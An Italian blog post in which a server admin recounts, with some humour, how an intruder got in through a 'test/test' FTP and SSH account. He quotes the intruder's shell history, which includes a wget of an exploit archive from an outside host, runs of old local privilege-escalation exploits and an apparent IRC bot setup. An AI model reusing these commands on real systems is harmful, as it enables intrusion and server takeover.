Questo server va a morire la settimana prossima. Ne prenderò uno un po’ più potente e voglio provare un altro provider. Vi farò sapere le mie impressioni.
Sto anche facendo un restyling del sito, e dato che serviva un accesso FTP ed io avevo fretta, ho installato proftpd e ho creato un utente “test”, password “test”, per poter far entrare il mio web designer.
Essendo anche un utente di sistema, l’accesso era possibile via SSH. E’ bastato qualche giorno che un hackerino è “riuscito” ad entrare, probabilmente grazie ad uno script kiddies, e ha tentato di rootarmi la Debian.
Com’è andata? Giudicatelo voi:
cat /var/www/test.lucarossi.info/.bash_history
uname -a /sbin/ifconfig | grep inet -w ps -x history w who passwd passwd passwd uname -a ls cd /tmp/ ls wget freewebtown.com/miaumiau/2010.tgz tar xzvf 2010.tgz cd 2010 ls ./x86 ./0x82 (questa roba è vecchia di ANNI!) ./2009 ./2009.c (questa è fantastica) ./run id ./exploit.c (sublime!!) ls -a ./run id ls -a cd /home/ ls ls -a su ftp su luca (prrr) id cd .. ls cd /tmp/ ls -a ls cd .ICE-unix/ ls tar xzvf psyro.tgz.gz cd . cd .access.log/ ls ./config maka 6667 ./run ./fuck cd .. ls rm -rf psyro.tgz.gz (non hai cancellato un tubo..) passwd
il ./fuck alla fine non promette niente di nuovo per il poveretto. Proverò ad installare il rootkit che ho trovato in /tmp ma presumo che non funzioneranno. Dopodiché ha cambiato la password ed io ho potuto beccarlo immediatamente.
Che dire? Ai miei tempi noi hackerini s’era molto più svegli!